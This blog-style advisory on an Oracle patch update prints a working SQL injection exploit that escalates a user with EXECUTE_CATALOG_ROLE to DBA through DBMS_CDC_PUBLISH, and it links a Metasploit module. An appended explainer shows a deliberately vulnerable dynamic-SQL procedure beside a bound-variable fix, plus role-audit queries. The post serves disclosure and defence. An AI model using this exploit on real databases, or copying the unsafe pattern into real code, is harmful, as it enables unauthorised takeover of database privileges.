There are some very interesting issues fixed by Oracle in this month's Critical Patch Update (CPU), although the details of the exact vulnerabilities are still not public. The ones I found really interesting are:
1. ZDI-10-201: Oracle Database Java Stored Procedure Race Condition Remote Code Execution Vulnerability
"This vulnerability allows remote attackers to break out of the Java Sandbox implemented by Oracle's relational database. Authentication is required in that a user must be able to create a Java stored procedure to trigger the issue." CVSS score 9
2. SQL Injection in DBMS_CDC_PUBLISH.CREATE_CHANGE_SET, reported by Esteban, which could allow any user with EXECUTE_CATALOG_ROLE to become DBA.
The exploit is fairly simple:
--------------------
as SCOTT user:
create or replace function pwn return varchar2 authid current_user is
PRAGMA autonomous_transaction;
BEGIN
execute immediate 'grant dba to scott';
commit;
return 'z';
END;
/
--
grant execute on SCOTT.pwn to public;
--
begin
sys.dbms_cdc_publish.create_change_set('a','a','a''||SCOTT.pwn()||''a','Y',sysdate,
sysdate);
end;
/
------------------
The exploit is already available in Metasploit: https://www.metasploit.com/redmine/projects/framework/repository/revisions/10691/entry/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb. Thanks to MC.
This affects 10gR1, 10gR2, 11gR1 and 11gR2. I agree with AppSec Inc that the CVSS score should be 7.5 and not the 4.9 which Oracle has assigned to it.
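The bug class behind item 2 is a definer's-rights SYS package splicing a caller-supplied string into dynamic SQL, so the quote-breaking payload above turns a parameter into a function call that runs with SYS's rights. The following is an added illustration, not Oracle's code: a hypothetical package DEMO_CDC (its name, the DEMO_CHANGE_SETS table and the procedure names are assumptions) showing the vulnerable pattern next to its bound-variable fix, followed by a DBA check for who holds the role that reaches such packages.

```sql
-- Constructed example (not Oracle's DBMS_CDC_PUBLISH): a definer's-rights
-- package with one concatenating procedure and one that binds its input.
CREATE TABLE demo_change_sets (set_name VARCHAR2(100));

CREATE OR REPLACE PACKAGE demo_cdc AUTHID DEFINER AS
  PROCEDURE create_set_unsafe(p_name IN VARCHAR2);
  PROCEDURE create_set_safe(p_name IN VARCHAR2);
END demo_cdc;
/
CREATE OR REPLACE PACKAGE BODY demo_cdc AS
  -- VULNERABLE PATTERN: p_name becomes part of the SQL *text*. An input
  -- such as  a'||some_function()||'a  closes the literal and the spliced
  -- call executes with the package owner's privileges (here: whoever owns
  -- DEMO_CDC; in the real bug, SYS).
  PROCEDURE create_set_unsafe(p_name IN VARCHAR2) IS
  BEGIN
    EXECUTE IMMEDIATE
      'INSERT INTO demo_change_sets (set_name) VALUES (''' || p_name || ''')';
  END create_set_unsafe;

  -- HARDENED: the value is bound, so it is only ever data. Quotes and
  -- concatenation operators in p_name are stored verbatim, never parsed.
  -- (Where a literal truly must be built, DBMS_ASSERT.ENQUOTE_LITERAL
  -- quotes it and rejects unescaped embedded quotes.)
  PROCEDURE create_set_safe(p_name IN VARCHAR2) IS
  BEGIN
    EXECUTE IMMEDIATE
      'INSERT INTO demo_change_sets (set_name) VALUES (:1)' USING p_name;
  END create_set_safe;
END demo_cdc;
/

-- Defender check: EXECUTE_CATALOG_ROLE is the precondition the advisory
-- names, so list every grantee and review whether each really needs it.
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'EXECUTE_CATALOG_ROLE'
 ORDER BY grantee;

-- And the outcome to watch for: unexpected holders of DBA.
SELECT grantee, admin_option
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;
```

Running `create_set_unsafe('a''||SCOTT.pwn()||''a')` against the demo would evaluate the embedded call; `create_set_safe` with the same input simply inserts the 23-character string.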